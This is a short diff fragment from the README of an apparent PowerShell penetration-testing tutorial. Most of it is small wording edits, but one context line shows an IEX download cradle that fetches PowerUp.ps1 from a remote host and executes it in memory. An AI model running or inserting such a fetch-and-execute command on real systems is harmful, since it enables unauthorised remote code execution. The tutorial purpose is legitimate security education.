snowcapcyber/PowerShell-for-Penetration-Testing/README.md

 PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://www.snowcapcyber.co.uk/PowerUp.ps1')
 ```

+PowerDhell also supports a set of functions that allow us to explore and manipulate a file system

-Now that we have the ability to profile PowerShell and find/install modules we can begin to use it to perform a penetration test.
+Now that we have the ability to use PowerShell and find/install modules we can begin to use it to perform a penetration test.

 ## Chapter 2 - Network Mapping